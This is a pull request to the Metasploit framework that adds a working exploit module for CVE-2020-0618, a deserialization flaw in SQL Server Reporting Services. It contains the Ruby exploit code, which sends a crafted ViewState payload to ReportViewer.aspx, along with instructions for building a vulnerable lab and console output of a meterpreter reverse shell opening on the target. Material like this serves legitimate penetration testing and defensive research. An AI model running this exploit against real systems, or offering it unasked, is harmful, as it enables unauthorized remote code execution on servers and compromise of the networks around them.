### PR TITLE
Add an exploit for SQL Server Reporting Services ViewState deserialization (CVE-2020-0618)

### DIFF
--- a/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md
+++ b/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md
@@ -12,11 +12,26 @@ least the "Browser" role on the site. This is the lowest privilege available and
 simply allows the user to view folders, reports and subscribe to reports. To
 authenticate as a domain user, set the `DOMAIN` option.
 
+### Service Installation And Setup
+
 Setting up a vulnerable environment for testing is best done by using a SQL
 Server 2016 installation ISO which includes an offline installer for SSRS. Later
-version of SQL Server installation ISOs link to an online installer which will
-install the patched version automatically. After the server has been installed,
-individual accounts can have privileges added by selecting "Manage Folder" and
+versions of SQL Server installation ISOs link to an online installer which will
+install the patched version automatically.
+
+When installing SQL Server 2016:
+
+  1. Select "New SQL Server stand-alone installation or add features to an
+    existing installation"
+  1. Later in the "Feature Selection" section, select "Reporting Services -
+    Native" under the "Instance Features" group
+  1. Proceed with the remainder of the installation per usual
+
+After the server has been installed, it must be configured using the "Reporting
+Services Configuration Manager" application. Ensure a database is selected and
+created, that both the Web Services URL and Web Portal URLs are activated.
+Finally, from the web interface, add accounts and privileges as desired.
+Individual accounts can have privileges added by selecting "Manage Folder" and
 adding them from this dashboard. **Do not use privileges dashboard available
 from "Site Settings" to add the necessary privileges.**
 

--- a/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md
+++ b/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md
@@ -1,0 +1,73 @@
+## Vulnerable Application
+
+This module exploits a .NET serialization vulnerability in the SQL Server
+Reporting Services web application. The vulnerability exists within the a class
+that will load serialized data submitted in a POST request. When processed this
+data can lead to code execution within the context of the application which by
+default is a service account.
+
+An account is necessary in order to leverage this vulnerability. The request is
+submitted using NTLM basic authentication. This account must be assigned at
+least the "Browser" role on the site. This is the lowest privilege available and
+simply allows the user to view folders, reports and subscribe to reports. To
+authenticate as a domain user, set the `DOMAIN` option.
+
+Setting up a vulnerable environment for testing is best done by using a SQL
+Server 2016 installation ISO which includes an offline installer for SSRS. Later
+version of SQL Server installation ISOs link to an online installer which will
+install the patched version automatically. After the server has been installed,
+individual accounts can have privileges added by selecting "Manage Folder" and
+adding them from this dashboard. **Do not use privileges dashboard available
+from "Site Settings" to add the necessary privileges.**
+
+## Verification Steps
+  Example steps in this format (is also in the PR):
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: `use exploit/windows/http/ssrs_navcorrector_viewstate`
+  1. Set the `RHOSTS`, `USERNAME` and `PASSWORD` options
+  4. Do: `run`
+  5. You should get a shell.
+
+### Version and OS
+
+  For example:
+
+    msf5 > use exploit/windows/http/ssrs_navcorrector_viewstate 
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set RHOSTS 192.168.159.141
+    RHOSTS => 192.168.159.141
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set USERNAME jdoe
+    USERNAME => jdoe
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set DOMAIN msflab.local
+    DOMAIN => msflab.local
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set PASSWORD Password1
+    PASSWORD => Password1
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+    PAYLOAD => windows/x64/meterpreter/reverse_tcp
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set LHOST 192.168.159.128 
+    LHOST => 192.168.159.128
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > check
+    [*] 192.168.159.141:80 - The service is running, but could not be validated.
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.159.128:4444 
+    [*] Command Stager progress -  24.99% done (2999/12002 bytes)
+    [*] Command Stager progress -  49.98% done (5998/12002 bytes)
+    [*] Command Stager progress -  74.96% done (8997/12002 bytes)
+    [*] Sending stage (206403 bytes) to 192.168.159.141
+    [*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.141:50376) at 2020-03-06 16:19:24 -0500
+    [*] Command Stager progress -  99.83% done (11982/12002 bytes)
+    [*] Command Stager progress - 100.00% done (12002/12002 bytes)
+    
+    meterpreter > getuid
+    Server username: NT Service\ReportServer
+    meterpreter > sysinfo
+    Computer        : SERVER2012
+    OS              : Windows 2012 R2 (6.3 Build 9600).
+    Architecture    : x64
+    System Language : en_US
+    Domain          : MSFLAB
+    Logged On Users : 10
+    Meterpreter     : x64/windows
+    meterpreter >

--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -41,7 +41,7 @@ module Exploit::Remote::HttpClient
         OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]),
         Opt::SSLVersion,
         OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]),
-        OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']),
+        OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKSTATION']),
         OptFloat.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']),
         OptBool.new('HttpPartialResponses', [false, 'Return partial HTTP responses despite timeouts', false]),
         OptBool.new('HttpTrace', [false, 'Show the raw HTTP requests and responses', false]),

--- a/modules/exploits/windows/http/exchange_ecp_viewstate.rb
+++ b/modules/exploits/windows/http/exchange_ecp_viewstate.rb
@@ -17,42 +17,43 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-        'Name'           => 'Exchange Control Panel Viewstate Deserialization',
-        'Description'    => %q{
-          This module exploits a .NET serialization vulnerability in the
-          Exchange Control Panel (ECP) web page. The vulnerability is due to
-          Microsoft Exchange Server not randomizing the keys on a
-          per-installation basis resulting in them using the same validationKey
-          and decryptionKey values. With knowledge of these, values an attacker
-          can craft a special viewstate to cause an OS command to be executed
-          by NT_AUTHORITY\SYSTEM using .NET deserialization.
-        },
-        'Author'         => 'Spencer McIntyre',
-        'License'        => MSF_LICENSE,
-        'References'     => [
-            ['CVE', '2020-0688'],
-            ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],
+      'Name'           => 'Exchange Control Panel ViewState Deserialization',
+      'Description'    => %q{
+        This module exploits a .NET serialization vulnerability in the
+        Exchange Control Panel (ECP) web page. The vulnerability is due to
+        Microsoft Exchange Server not randomizing the keys on a
+        per-installation basis resulting in them using the same validationKey
+        and decryptionKey values. With knowledge of these, values an attacker
+        can craft a special ViewState to cause an OS command to be executed
+        by NT_AUTHORITY\SYSTEM using .NET deserialization.
+      },
+      'Author'         => 'Spencer McIntyre',
+      'License'        => MSF_LICENSE,
+      'References'     => [
+          ['CVE', '2020-0688'],
+          ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],
+      ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],
+          [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]
         ],
-        'Platform'       => 'win',
-        'Targets'        =>
-          [
-            [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],
-            [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],
-            [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]
-          ],
-        'DefaultOptions' =>
-          {
-            'SSL' => true
-          },
-        'DefaultTarget'  => 1,
-        'DisclosureDate' => '2020-02-11',
-        'Notes'          =>
-          {
-            'Stability'   => [ CRASH_SAFE, ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
-            'Reliability' => [ REPEATABLE_SESSION, ],
-          }
-        ))
+      'DefaultOptions' =>
+        {
+          'SSL' => true
+        },
+      'DefaultTarget'  => 1,
+      'DisclosureDate' => '2020-02-11',
+      'Notes'          =>
+        {
+          'Stability'   => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+        },
+      'Privileged'      => true
+    ))
 
     register_options([
       Opt::RPORT(443),

--- a/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb
+++ b/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb
@@ -1,0 +1,110 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'SQL Server Reporting Services (SSRS) Viewstate Deserialization',
+      'Description' => %q{
+        A vulnerability exists within Microsoft's SQL Server Reporting Services
+        which can allow an attacker to craft an HTTP POST request with a
+        serialized object to achieve remote code execution. The vulnerability is
+        due to the fact that the serialized blob is not signed by the server.
+      },
+      'Author' => 'Spencer McIntyre',
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['CVE', '2020-0618'],
+        ['URL', 'https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/'],
+      ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],
+          [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 3000 } ]
+        ],
+      'DefaultTarget'  => 1,
+      'DisclosureDate' => '2020-02-11'))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the web application', '/Reports' ]),
+      OptString.new('DOMAIN',    [ true, 'The domain to use for Windows authentication', 'WORKSTATION' ]),
+      OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
+      OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
+    ])
+    register_advanced_options([
+      OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),
+    ])
+  end
+
+  def send_api_request(*parts)
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, 'api', 'v1.0', *parts),
+      'headers'   => {
+        'Accept'  => 'application/json',
+      },
+      'username'  => datastore['USERNAME'],
+      'password'  => datastore['PASSWORD']
+    })
+    if res && res.code == 200 && res.headers['Content-Type'].strip.start_with?('application/json;')
+      begin
+        return JSON.parse(res.body)
+      rescue JSON::PareError
+        print_error('Received invalid JSON body in an API response body')
+      end
+    end
+  end
+
+  def check
+    json_response = send_api_request('ReportServerInfo', 'Model.SiteName')
+    return CheckCode::Unknown unless json_response && json_response['value'] == 'SQL Server Reporting Services'
+    CheckCode::Detected
+  end
+
+  def exploit
+    fail_with(Failure::NotFound, 'Failed to detect the application') unless check == CheckCode::Detected
+
+    json_response = send_api_request('ReportServerInfo', 'Model.GetVirtualDirectory')
+    fail_with(Failure::UnexpectedReply, 'Failed to detect the report server virtual directory') if json_response.nil?
+    directory = json_response['value']
+    vprint_status("Detected the report server virtual directory as: #{directory}")
+
+    state = {vd: directory}
+    if target.arch.first == ARCH_CMD
+      execute_command(payload.encoded, state: state)
+    else
+      cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first
+      execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})
+    end
+  end
+
+  def execute_command(cmd, opts)
+    state = opts[:state]
+    viewstate = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(cmd))
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(state[:vd], 'Pages', 'ReportViewer.aspx'),
+      'method'    => 'POST',
+      'vars_post' => {
+        'NavigationCorrector$PageState' => 'NeedsCorrection',
+        'NavigationCorrector$ViewState' => viewstate,
+        '__VIEWSTATE'                   => ''
+      },
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+
+    unless res&.code == 200
+      print_error('Non-200 HTTP response received while trying to execute the command')
+    end
+
+  end
+end

--- a/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb
+++ b/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if target['Type'] == :windows_command
       execute_command(payload.encoded, state: state)
     else
-      cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first
+      cmd_target = targets.select { |target| target['Type'] == :windows_command }.first
       execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})
     end
   end

--- a/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb
+++ b/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb
@@ -11,14 +11,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name' => 'SQL Server Reporting Services (SSRS) Viewstate Deserialization',
+      'Name' => 'SQL Server Reporting Services (SSRS) ViewState Deserialization',
       'Description' => %q{
         A vulnerability exists within Microsoft's SQL Server Reporting Services
         which can allow an attacker to craft an HTTP POST request with a
         serialized object to achieve remote code execution. The vulnerability is
         due to the fact that the serialized blob is not signed by the server.
       },
-      'Author' => 'Spencer McIntyre',
+      'Author' => [
+        'Soroush Dalili',   # discovery and original PoC
+        'Spencer McIntyre'  # metasploit module
+      ],
       'License' => MSF_LICENSE,
       'References' => [
         ['CVE', '2020-0618'],
@@ -27,12 +30,20 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],
-          [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],
-          [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 3000 } ]
+          [ 'Windows (x86)', { 'Arch' => ARCH_X86, 'Type' => :windows_dropper } ],
+          [ 'Windows (x64)', { 'Arch' => ARCH_X64, 'Type' => :windows_dropper } ],
+          [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ]
         ],
       'DefaultTarget'  => 1,
-      'DisclosureDate' => '2020-02-11'))
+      'DisclosureDate' => '2020-02-11',
+      'Notes'          =>
+        {
+          'Stability'   => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+        },
+      'Privileged'     => true,
+    ))
 
     register_options([
       OptString.new('TARGETURI', [ true, 'The base path to the web application', '/Reports' ]),
@@ -47,6 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def send_api_request(*parts)
     res = send_request_cgi({
+      'method'    => 'GET',
       'uri'       => normalize_uri(target_uri.path, 'api', 'v1.0', *parts),
       'headers'   => {
         'Accept'  => 'application/json',
@@ -54,12 +66,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'username'  => datastore['USERNAME'],
       'password'  => datastore['PASSWORD']
     })
-    if res && res.code == 200 && res.headers['Content-Type'].strip.start_with?('application/json;')
-      begin
-        return JSON.parse(res.body)
-      rescue JSON::PareError
-        print_error('Received invalid JSON body in an API response body')
-      end
+    if res&.code == 200 && res.headers['Content-Type'].strip.start_with?('application/json;')
+      return res.get_json_document
     end
   end
 
@@ -78,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Detected the report server virtual directory as: #{directory}")
 
     state = {vd: directory}
-    if target.arch.first == ARCH_CMD
+    if target['Type'] == :windows_command
       execute_command(payload.encoded, state: state)
     else
       cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first


### PR DESCRIPTION
This PR adds an exploit for CVE-2020-0618 which is a deserialization flaw in SQL Server Reporting Services (SSRS) where the `LosFormatter` is not configured to perform validation.

See the module docs for info on setting up a vulnerable environment for testing.

I couldn't get a decent check method due to the server always returning 200 OK despite the variations in my request. The best we can do is to identify that the service is running and take it from there.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/ssrs_navcorrector_viewstate`
    - [ ] Set the `RHOSTS`, `USERNAME` and `PASSWORD` options
- [ ] The `check` method should identify that the service is running
- [ ] The `exploit` method should execute the selected payload

## Example

Target service is SSRS 2016 running on Server 2012 x64.

```
msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Command Stager progress -  24.99% done (2999/12002 bytes)
[*] Command Stager progress -  49.98% done (5998/12002 bytes)
[*] Command Stager progress -  74.96% done (8997/12002 bytes)
[*] Sending stage (206403 bytes) to 192.168.159.141
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.141:50376) at 2020-03-06 16:19:24 -0500
[*] Command Stager progress -  99.83% done (11982/12002 bytes)
[*] Command Stager progress - 100.00% done (12002/12002 bytes)

meterpreter > getuid
Server username: NT Service\ReportServer
meterpreter > sysinfo
Computer        : SERVER2012
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 10
Meterpreter     : x64/windows
meterpreter > 
```
